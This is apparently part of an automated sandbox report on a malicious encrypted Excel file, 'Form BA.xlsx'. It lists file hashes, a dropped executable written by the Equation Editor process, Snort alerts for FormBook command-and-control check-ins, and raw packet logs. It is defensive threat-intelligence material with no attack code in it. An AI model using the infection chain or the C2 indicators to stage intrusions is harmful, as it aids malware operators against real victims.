                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\965742FE.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BFF9592.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3F7F095.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB839B70.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):648132
                                                                                                                                                  Entropy (8bit):2.812369690502041
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
                                                                                                                                                  MD5:2051FB74D1E67A37780B94F236AFB26D
                                                                                                                                                  SHA1:8BA9450C0530390D27E7FDCEC790D3897730DFA4
                                                                                                                                                  SHA-256:643983836D160B51928239762C729C2B9D374A85B803387CE24B3C02F3C55B04
                                                                                                                                                  SHA-512:C1C3FF7400EAD8F1B0CD7ED7C2378974ABE971F7FA8943EA583ED9FF9E4341EE9C102E6FA9C1D9C784C26DC716944638B83781BE3E60E0A5EF8698B1FD9BA3DA
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1FF01E4.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2827BAF.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7608
                                                                                                                                                  Entropy (8bit):5.084398854528001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+SFvbLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Fvw+sW31RGtdVDYM3VfmkpH
                                                                                                                                                  MD5:47A28CB161396FA7C67E39A74619C8CD
                                                                                                                                                  SHA1:B65196123279EE71D31E2C3D23B98937096F08F1
                                                                                                                                                  SHA-256:BB9E78C91679C8FCC51849CCED0EE7E7CE680E9249A2B074A681AAC1D7379DDC
                                                                                                                                                  SHA-512:99882C47315A1209104BE1C0CE49391B9AD9A04C8480297FF6E30C1D8ECEBC4EF3F3557869E685D5CA37879CA96B4F398514367AE73777AE3433C19505352797
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1ED9AE7.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B6.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B7.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso37B8.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE743.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE773.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE774.tmp
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1254
                                                                                                                                                  Entropy (8bit):5.835900066445133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                                                                                  MD5:A3C62E516777C15BF216F12143693C61
                                                                                                                                                  SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                                                                                  SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                                                                                  SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                                                                                  Malicious:false
                                                                                                                                                  C:\Users\user\Desktop\~$Form BA.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):713216
                                                                                                                                                  Entropy (8bit):7.571021299706813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
                                                                                                                                                  MD5:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  SHA1:27D6276E49602F3633DFDD94DE400DB53E209B51
                                                                                                                                                  SHA-256:D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
                                                                                                                                                  SHA-512:012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.993957532893648
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:Form BA.xlsx
                                                                                                                                                  File size:1277440
                                                                                                                                                  MD5:f683a8eb2e17866a194af9b23efda095
                                                                                                                                                  SHA1:b3002f93d24336a9af003a7a3da36217a7d7b8db
                                                                                                                                                  SHA256:e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
                                                                                                                                                  SHA512:7d61feb01d5ab561848c500232cefa553b6ef818487ef8361e13f32b00d8340425a93f518e867e449d689d1a2f3dfb4136ed9c9380c03fde7e72acf86e55716a
                                                                                                                                                  SSDEEP:24576:8eZrCoZjO0Z3LTlr6QoKZavurFhXI7EUMYcSNk5TIwrgm80Wa4+W3xBK8Gom9KvE:VZrCf0Z3d2e0urFhbpYBNk5T9q0bohBA

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Form BA.xlsx"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:64
                                                                                                                                                  Entropy:2.73637206947
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:112
                                                                                                                                                  Entropy:2.7597816111
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.13335930328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/Version
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:76
                                                                                                                                                  Entropy:2.79079600998
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1263144
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptedPackage
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1263144
                                                                                                                                                  Entropy:7.99876353791
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptionInfo
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:224
                                                                                                                                                  Entropy:4.62639518968
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . = . . . . . . . % ] . . . . . C . N . . . . w . . . _ . . . . . . . . ) . ? [ k . . p . . . . W . . . . . P . . . X . . . . . . v . .

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                        Source Port  Dest Port  Source IP     Dest IP
07/22/21-17:16:43.686728  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49167        80         192.168.2.22  151.101.0.119
07/22/21-17:16:43.686728  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49167        80         192.168.2.22  151.101.0.119
07/22/21-17:16:43.686728  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49167        80         192.168.2.22  151.101.0.119
07/22/21-17:16:51.093327  ICMP      402      ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.22  8.8.8.8

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                  Jul 22, 2021 17:15:02.964207888 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964229107 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964265108 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964304924 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964306116 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964318991 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964330912 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964343071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964344025 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964381933 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964411020 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964425087 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964443922 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964449883 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964452982 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964483023 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964484930 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964512110 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964534998 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964536905 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964549065 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964562893 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964571953 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964589119 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964596987 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964612961 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964621067 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964638948 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964648962 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964664936 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964673042 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964695930 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:02.964699984 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:02.964724064 CEST80491653.121.113.175192.168.2.22
